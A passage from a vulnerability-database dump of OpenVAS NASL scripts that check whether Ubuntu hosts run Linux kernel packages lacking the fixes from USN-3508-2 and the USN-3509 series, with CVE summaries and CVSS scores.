script_name(\"Ubuntu Update for linux-hwe USN-3508-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-hwe'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3508-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 17.04. This update provides the corresponding updates\n for the Linux Hardware Enablement (HWE) kernel from Ubuntu 17.04 for Ubuntu\n 16.04 LTS. Mohamed Ghannam discovered that a use-after-free vulnerability\n existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\n could use this to cause a denial of service (system crash) or possibly execute\n arbitrary code. (CVE-2017-16939) It was discovered that the Linux kernel did not\n properly handle copy-on- write of transparent huge pages. A local attacker could\n use this to cause a denial of service (application crashes) or possibly gain\n administrative privileges. (CVE-2017-1000405) Yonggang Guo discovered that a\n race condition existed in the driver subsystem in the Linux kernel. A local\n attacker could use this to possibly gain administrative privileges.\n (CVE-2017-12146)\");\n script_tag(name:\"affected\", value:\"linux-hwe on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3508-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3508-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-generic\", ver:\"4.10.0-42.46~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-generic-lpae\", ver:\"4.10.0-42.46~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-lowlatency\", ver:\"4.10.0-42.46~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-hwe-16.04\", ver:\"4.10.0.42.44\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-hwe-16.04\", ver:\"4.10.0.42.44\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-hwe-16.04\", ver:\"4.10.0.42.44\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-15T00:00:00", "id": "OPENVAS:1361412562310843403", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843403", "type": "openvas", "title": "Ubuntu Update for linux-lts-xenial USN-3509-4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3509_4.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-lts-xenial USN-3509-4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843403\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-15 12:41:42 +0100 (Fri, 15 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12193\", \"CVE-2017-16643\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-xenial USN-3509-4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-xenial'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3509-2 fixed vulnerabilities in the\n Linux Hardware Enablement kernel for Ubuntu 14.04 LTS. Unfortunately, it also\n introduced a regression that prevented the Ceph network filesystem from being\n used. This update fixes the problem. We apologize for the inconvenience.\n Original advisory details: Mohamed Ghannam discovered that a use-after-free\n vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. A\n local attacker could use this to cause a denial of service (system crash) or\n possibly execute arbitrary code. (CVE-2017-16939) It was discovered that the\n Linux kernel did not properly handle copy-on- write of transparent huge pages. A\n local attacker could use this to cause a denial of service (application crashes)\n or possibly gain administrative privileges. (CVE-2017-1000405) Fan Wu, Haoran\n Qiu, and Shixiong Zhao discovered that the associative array implementation in\n the Linux kernel sometimes did not properly handle adding a new entry. A local\n attacker could use this to cause a denial of service (system crash).\n (CVE-2017-12193) Andrey Konovalov discovered an out-of-bounds read in the GTCO\n digitizer USB driver for the Linux kernel. A physically proximate attacker could\n use this to cause a denial of service (system crash) or possibly execute\n arbitrary code. (CVE-2017-16643)\");\n script_tag(name:\"affected\", value:\"linux-lts-xenial on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3509-4\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3509-4/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1006-aws\", ver:\"4.4.0-1006.6\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-generic\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-generic-lpae\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-lowlatency\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc-e500mc\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc-smp\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc64-emb\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc64-smp\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1006.6\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843398", "type": "openvas", "title": "Ubuntu Update for linux USN-3509-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3509_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3509-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843398\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:55 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12193\", \"CVE-2017-16643\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3509-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mohamed Ghannam discovered that a\n use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the\n Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16939) It was\n discovered that the Linux kernel did not properly handle copy-on- write of\n transparent huge pages. A local attacker could use this to cause a denial of\n service (application crashes) or possibly gain administrative privileges.\n (CVE-2017-1000405) Fan Wu, Haoran Qiu, and Shixiong Zhao discovered that the\n associative array implementation in the Linux kernel sometimes did not properly\n handle adding a new entry. A local attacker could use this to cause a denial of\n service (system crash). (CVE-2017-12193) Andrey Konovalov discovered an\n out-of-bounds read in the GTCO digitizer USB driver for the Linux kernel. A\n physically proximate attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16643)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3509-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3509-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1012-kvm\", ver:\"4.4.0-1012.17\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-generic\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-generic-lpae\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-lowlatency\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc-e500mc\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc-smp\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc64-emb\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc64-smp\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1043-aws\", ver:\"4.4.0-1043.52\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1079-raspi2\", ver:\"4.4.0-1079.87\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1081-snapdragon\", ver:\"4.4.0-1081.86\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1043.45\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.4.0.1012.12\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.4.0.1079.79\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.4.0.1081.73\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-15T00:00:00", "id": "OPENVAS:1361412562310843402", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843402", "type": "openvas", "title": "Ubuntu Update for linux USN-3509-3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3509_3.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3509-3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843402\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-15 12:41:32 +0100 (Fri, 15 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12193\", \"CVE-2017-16643\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3509-3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3509-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 16.04 LTS. Unfortunately, it also introduced a\n regression that prevented the Ceph network filesystem from being used. This\n update fixes the problem. We apologize for the inconvenience. Original advisory\n details: Mohamed Ghannam discovered that a use-after-free vulnerability existed\n in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker could use\n this to cause a denial of service (system crash) or possibly execute arbitrary\n code. (CVE-2017-16939) It was discovered that the Linux kernel did not properly\n handle copy-on- write of transparent huge pages. A local attacker could use this\n to cause a denial of service (application crashes) or possibly gain\n administrative privileges. (CVE-2017-1000405) Fan Wu, Haoran Qiu, and Shixiong\n Zhao discovered that the associative array implementation in the Linux kernel\n sometimes did not properly handle adding a new entry. A local attacker could use\n this to cause a denial of service (system crash). (CVE-2017-12193) Andrey\n Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for\n the Linux kernel. A physically proximate attacker could use this to cause a\n denial of service (system crash) or possibly execute arbitrary code.\n (CVE-2017-16643)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3509-3\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3509-3/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1013-kvm\", ver:\"4.4.0-1013.18\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-generic\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-generic-lpae\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-lowlatency\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc-e500mc\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc-smp\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc64-emb\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc64-smp\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1044-aws\", ver:\"4.4.0-1044.53\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1080-raspi2\", ver:\"4.4.0-1080.88\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1044.46\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.4.0.1013.13\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.4.0.1080.80\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-09T00:00:00", "id": "OPENVAS:1361412562310843400", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843400", "type": "openvas", "title": "Ubuntu Update for linux-aws USN-3509-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3509_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-aws USN-3509-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but 